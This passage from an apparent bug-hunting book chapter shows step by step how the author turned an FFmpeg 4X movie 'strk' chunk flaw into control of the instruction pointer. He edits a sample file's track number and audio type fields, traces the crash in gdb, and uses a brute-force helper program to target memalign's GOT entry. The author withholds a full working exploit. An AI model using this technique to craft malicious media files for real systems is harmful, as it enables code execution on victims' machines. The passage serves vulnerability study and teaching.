To exploit the vulnerability I did the following:
The vulnerability affects all operating system platforms supported by FFmpeg. The platform that I used throughout this chapter was the default installation of Ubuntu Linux 9.04 (32-bit).
Step 1: Find a sample 4X movie file with a valid strk
chunk.
Step 2: Learn about the layout of the strk
chunk.
Step 3: Manipulate the strk
chunk to crash FFmpeg.
Step 4: Manipulate the strk
chunk to get control over EIP
.
There are different ways to exploit file format bugs. I could either create a file with the right format from scratch or alter an existing file. I chose the latter approach. I used the website http://samples.mplayerhq.hu/ to find a 4X movie file suitable for testing this vulnerability. I could have built a file myself, but downloading a preexisting file is fast and easy.
I used the following to get a sample file from http://samples.mplayerhq.hu/.
linux$wget -q http://samples.mplayerhq.hu/ga
me-formats/4xm/
→TimeGatep01s01n01a02_2.4xm
After downloading the file, I renamed it original.4xm.
According to the 4X movie file format description, a strk
chunk has the following structure:
bytes 0-3 fourcc: 'strk' bytes 4-7 length of strk structure (40 or 0x28 bytes) bytes 8-11 track number bytes 12-15 audio type: 0 = PCM, 1 = 4X IMA ADPCM bytes 16-35 unknown bytes 36-39 number of audio channels bytes 40-43 audio sample rate bytes 44-47 audio sample resolution (8 or 16 bits)
The strk
chunk of the downloaded sample file starts at file offset 0x1a6
, as shown in Figure 4-4:
Figure 4-4. A strk
chunk from the 4X movie sample file I downloaded. The numbers shown are referenced in Table 4-1.
Table 4-1 describes the layout of the strk
chunk illustrated in Figure 4-4.
Table 4-1. Components of strk Chunk Layout Shown in Figure 4-4
Reference | Header offset | Description |
---|---|---|
(1) |
|
|
(2) |
| length of |
(3) |
|
|
(4) |
|
|
To exploit this vulnerability, I knew that I would need to set the values of track number
at &header[i+8]
(that corresponds to current_track
from FFmpeg source code) and audio type
at &header[i+12]
. If I set the values properly, the value of audio type
would be written at the memory location NULL + track number
, which is the same as NULL + current_track
.
In summary, the (nearly) arbitrary memory write operations from the FFmpeg source code are as follows:
[..] 178 fourxm->tracks[current_track].adpcm = AV_RL32(&header[i + 12]); 179 fourxm->tracks[current_track].channels = AV_RL32(&header[i + 36]); 180 fourxm->tracks[current_track].sample_rate = AV_RL32(&header[i + 40]); 181 fourxm->tracks[current_track].bits = AV_RL32(&header[i + 44]); [..]
And each corresponds to this pseudo code:
NULL[user_controlled_value].offset = user_controlled_data;
Compiling FFmpeg: linux$ ./configure; make These commands will compile two different binary versions of FFmpeg:
ffmpeg Binary without debugging symbols
ffmpeg_g Binary with debugging symbols
After compiling the vulnerable FFmpeg source code revision 16556, I tried to convert the 4X movie into an AVI file to verify that the compilation was successful and that FFmpeg worked flawlessly.
linux$ ./ffmpeg_g -i original.4xm original.avi
FFmpeg version SVN-r16556, Copyright (c) 2000-2009 Fabrice Bellard, et al.
configuration:
libavutil 49.12. 0 / 49.12. 0
libavcodec 52.10. 0 / 52.10. 0
libavformat 52.23. 1 / 52.23. 1
libavdevice 52. 1. 0 / 52. 1. 0
built on Jan 24 2009 02:30:50, gcc: 4.3.3
Input #0, 4xm, from 'original.4xm':
Duration: 00:00:13.20, start: 0.000000, bitrate: 704 kb/s
Stream #0.0: Video: 4xm, rgb565, 640x480, 15.00 tb(r)
Stream #0.1: Audio: pcm_s16le, 22050 Hz, stereo, s16, 705 kb/s
Output #0, avi, to 'original.avi':
Stream #0.0: Video: mpeg4, yuv420p, 640x480, q=2-31, 200 kb/s, 15.00 tb(c)
Stream #0.1: Audio: mp2, 22050 Hz, stereo, s16, 64 kb/s
Stream mapping:
Stream #0.0 -> #0.0
Stream #0.1 -> #0.1
Press [q] to stop encoding
frame= 47 fps= 0 q=2.3 Lsize= 194kB time=3.08 bitrate= 515.3kbits/s
video:158kB audio:24kB global headers:0kB muxing overhead 6.715897%
Next, I modified the values of track number
as well as audio type
in the strk
chunk of the sample file.
As illustrated in Figure 4-5, I changed the value of track number
to 0xaaaaaaaa
(1) and the value of audio type
to 0xbbbbbbbb
(2). I named the new file poc1.4xm and tried to convert it with FFmpeg (see Section B.4 for a description of the following debugger commands).
Figure 4-5. The strk
chunk of the sample file after I altered it. The changes I made are highlighted and framed, and the numbers shown are referenced in the text above.
linux$gdb ./ffmpeg_g
GNU gdb 6.8-debian Copyright (C) 2008 Free Software Foundation, Inc. License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html> This is free software: you are free to change and redistribute it. There is NO WARRANTY, to the extent permitted by law. Type "show copying" and "show warranty" for details. This GDB was configured as "i486-linux-gnu"... (gdb)set disassembly-flavor intel
(gdb)run -i poc1.4xm
Starting program: /home/tk/BHD/ffmpeg/ffmpeg_g -i poc1.4xm FFmpeg version SVN-r16556, Copyright (c) 2000-2009 Fabrice Bellard, et al. configuration: libavutil 49.12. 0 / 49.12. 0 libavcodec 52.10. 0 / 52.10. 0 libavformat 52.23. 1 / 52.23. 1 libavdevice 52. 1. 0 / 52. 1. 0 built on Jan 24 2009 02:30:50, gcc: 4.3.3Program received signal SIGSEGV, Segmentation fault.
0x0809c89d in fourxm_read_header (s=0x8913330,
ap=0xbf8b6c24) at libavformat/4xm.c:178
178 fourxm->tracks[current_track].adpcm = AV_RL32(&header[i + 12]);
As expected, FFmpeg crashed with a segmentation fault at source code line 178. I further analyzed the FFmpeg process within the debugger to see what exactly caused the crash.
(gdb)info registers
eax 0xbbbbbbbb
−1145324613 ecx 0x891c400 143770624 edx 0x0 0ebx 0xaaaaaaaa
−1431655766 esp 0xbf8b6aa0 0xbf8b6aa0 ebp 0x55555548 0x55555548 esi 0x891c3c0 143770560 edi 0x891c340 143770432 eip 0x809c89d 0x809c89d <fourxm_read_header+509> eflags 0x10207 [ CF PF IF RF ] cs 0x73 115 ss 0x7b 123 ds 0x7b 123 es 0x7b 123 fs 0x0 0 gs 0x33 51
At the time of the crash, the registers EAX
and EBX
were filled with the values that I input for audio type
(0xbbbbbbbb
) and track number
(0xaaaaaaaa
). Next, I asked the debugger to display the last instruction executed by FFmpeg:
(gdb) x/1i $eip
0x809c89d <fourxm_read_header+509>: mov DWORD PTR [edx+ebp*1+0x10],eax
As the debugger output shows, the instruction that caused the segmentation fault was attempting to write the value 0xbbbbbbbb
at an address calculated using my value for track number
.
To control the memory write, I needed to know how the destination address of the write operation was calculated. I found the answer by looking at the following assembly code:
(gdb) x/7i $eip - 21
0x809c888 <fourxm_read_header+488>: lea ebp,[ebx+ebx*4]
0x809c88b <fourxm_read_header+491>: mov eax,DWORD PTR [esp+0x34]
0x809c88f <fourxm_read_header+495>: mov edx,DWORD PTR [esi+0x10]
0x809c892 <fourxm_read_header+498>: mov DWORD PTR [esp+0x28],ebp
0x809c896 <fourxm_read_header+502>: shl ebp,0x2
0x809c899 <fourxm_read_header+505>: mov eax,DWORD PTR [ecx+eax*1+0xc]
0x809c89d <fourxm_read_header+509>: mov DWORD PTR [edx+ebp*1+0x10],eax
These instructions correspond to the following C source line:
[..] 178 fourxm->tracks[current_track].adpcm = AV_RL32(&header[i + 12]); [..]
Table 4-2 explains the results of these instructions.
Since EBX
contains the value I supplied for current_track
and EDX
contains the NULL pointer of fourxm->tracks
, the calculation can be expressed as this:
edx + ((ebx + ebx * 4) << 2) + 0x10 = destination address of the write operation
Table 4-2. List of the Assembler Instructions and the Result of Each Instruction
Result | |
---|---|
|
|
|
|
|
|
|
|
|
|
|
|
Or in a more simplified form:
edx + (ebx * 20) + 0x10 = destination address of the write operation
I supplied the value 0xaaaaaaaa
for current_track
(EBX
register), so the calculation should look like this:
NULL + (0xaaaaaaaa * 20) + 0x10 = 0x55555558
The result of 0x55555558
can be confirmed with the help of the debugger:
(gdb) x/1x $edx+$ebp+0x10
0x55555558: Cannot access memory at address 0x55555558
The vulnerability allowed me to overwrite nearly arbitrary memory addresses with any 4-byte value. To gain control of the execution flow of FFmpeg, I had to overwrite a memory location that would allow me to control the EIP
register. I had to find a stable address, one that was predictable within the address space of FFmpeg. That ruled out all stack addresses of the process. But the Executable and Linkable Format (ELF) used by Linux provides an almost perfect target: the Global Offset Table (GOT). Every library function used in FFmpeg has a reference in the GOT. By manipulating GOT entries, I could easily gain control of the execution flow (see Section A.4). The good thing about the GOT is that it’s predictable, which is exactly what I needed. I could gain control of EIP
by overwriting the GOT entry of a library function that is called after the vulnerability happens.
So, what library function is called after the arbitrary memory writes? To answer this question, I had a look at the source code again:
libavformat/4xm.c
fourxm_read_header()
[..]
184 /* allocate a new AVStream */
185 st = av_new_stream(s, current_track);
[..]
Directly after the four memory-write operations, a new AVStream
is allocated using the function av_new_stream()
.
libavformat/utils.c
av_new_stream()
[..]2271 AVStream *av_new_stream(AVFormatContext *s, int id)
2272 { 2273 AVStream *st; 2274 int i; 2275 2276 if (s->nb_streams >= MAX_STREAMS) 2277 return NULL; 22782279 st = av_mallocz(sizeof(AVStream));
[..]
In line 2279 another function named av_mallocz()
is called.
libavutil/mem.c
av_mallocz()
and av_malloc()
[..]43 void *av_malloc(unsigned int size)
44 { 45 void *ptr = NULL; 46 #ifdef CONFIG_MEMALIGN_HACK 47 long diff; 48 #endif 49 50 /* let's disallow possible ambiguous cases */ 51 if(size > (INT_MAX-16) ) 52 return NULL; 53 54 #ifdef CONFIG_MEMALIGN_HACK 55 ptr = malloc(size+16); 56 if(!ptr) 57 return ptr; 58 diff= ((-(long)ptr - 1)&15) + 1; 59 ptr = (char*)ptr + diff; 60 ((char*)ptr)[-1]= diff; 61 #elif defined (HAVE_POSIX_MEMALIGN) 62 posix_memalign(&ptr,16,size); 63 #elif defined (HAVE_MEMALIGN)64 ptr = memalign(16,size);
[..]135 void *av_mallocz(unsigned int size)
136 {137 void *ptr = av_malloc(size);
138 if (ptr) 139 memset(ptr, 0, size); 140 return ptr; 141 } [..]
In line 137 the function av_malloc()
is called, and it calls memalign()
in line 64 (the other ifdef
cases—lines 54 and 61—are not defined when using the Ubuntu Linux 9.04 platform). I was excited to see memalign()
because it was exactly what I was looking for: a library function that’s called directly after the vulnerability happens (see Figure 4-6).
That brought me to the next question: What is the address of the GOT entry of memalign()
in FFmpeg?
I gained this information with the help of objdump
:
linux$ objdump -R ffmpeg_g | grep memalign
08560204 R_386_JUMP_SLOT posix_memalign
So the address I had to overwrite was 0x08560204
. All I had to do was calculate an appropriate value for track number
(current_track
). I could get that value in either of two ways: I could try to calculate it, or I could use brute force. I chose the easy option and wrote the following program:
Example 4-1. Little helper program to use brute force to find the appropriate value for current_track
(addr_brute_force.c)
01 #include <stdio.h> 02 03 // GOT entry address of memalign() 04 #define MEMALIGN_GOT_ADDR 0x08560204 05 06 // Min and max value for 'current_track' 07 #define SEARCH_START 0x80000000 08 #define SEARCH_END 0xFFFFFFFF 09 10 int 11 main (void) 12 { 13 unsigned int a, b = 0; 14 15 for (a = SEARCH_START; a < SEARCH_END; a++) { 16 b = (a * 20) + 0x10; 17 if (b == MEMALIGN_GOT_ADDR) { 18 printf ("Value for 'current_track': %08x ", a); 19 return 0; 20 } 21 } 22 23 printf ("No valid value for 'current_track' found. "); 24 25 return 1; 26 }
The program illustrated in Example 4-1 uses brute force to find an appropriate track number
(current_track
) value, which is needed to overwrite the (GOT) address defined in line 4. This is done by trying all possible values for current_track
until the result of the calculation (see line 16) matches the searched GOT entry address of memalign()
(see line 17). To trigger the vulnerability, current_track
has to be interpreted as negative, so only values in the range of 0x80000000
to 0xffffffff
are considered (see line 15).
Example:
linux$gcc -o addr_brute_force addr_brute_force.c
linux$./addr_brute_force
Value for 'current_track': 8d378019
I then adjusted the sample file and renamed it poc2.4xm.
The only thing I changed was the value of track number
(see (1) in Figure 4-7). It now matched the value generated by my little helper program.
I then tested the new proof-of-concept file in the debugger (see Section B.4 for a description of the following debugger commands).
linux$gdb -q ./ffmpeg_g
(gdb)run -i poc2.4xm
Starting program: /home/tk/BHD/ffmpeg/ffmpeg_g -i poc2.4xm FFmpeg version SVN-r16556, Copyright (c) 2000-2009 Fabrice Bellard, et al. configuration: libavutil 49.12. 0 / 49.12. 0 libavcodec 52.10. 0 / 52.10. 0 libavformat 52.23. 1 / 52.23. 1 libavdevice 52. 1. 0 / 52. 1. 0 built on Jan 24 2009 02:30:50, gcc: 4.3.3 Program received signal SIGSEGV, Segmentation fault.0xbbbbbbbb in ?? ()
(gdb)info registers
eax 0xbfc1ddd0 −1077813808 ecx 0x9f69400 167154688 edx 0x9f60330 167117616 ebx 0x0 0 esp 0xbfc1ddac 0xbfc1ddac ebp 0x85601f4 0x85601f4 esi 0x164 356 edi 0x9f60330 167117616eip 0xbbbbbbbb 0xbbbbbbbb
eflags 0x10293 [ CF AF SF IF RF ] cs 0x73 115 ss 0x7b 123 ds 0x7b 123 es 0x7b 123 fs 0x0 0 gs 0x33 51
Bingo! Full control over EIP
. After I gained control over the instruction pointer, I developed an exploit for the vulnerability. I used the VLC media player as an injection vector, because it uses the vulnerable version of FFmpeg.
As I’ve said in previous chapters, the laws in Germany do not allow me to provide a full working exploit, but you can watch a short video I recorded that shows the exploit in action on the book’s website.[41]
Figure 4-8 summarizes the steps I used to exploit the vulnerability. Here is the anatomy of the bug shown in this figure:
The destination address for the memory write is calculated while using current_track
as an index (NULL
+ current_track
+ offset). The value of current_track
derives from user-controlled data of the 4xm media file.
The source data of the memory write derives from user-controlled data of the media file.
The user-controlled data is copied at the memory location of the memalign()
GOT entry.
3.129.247.196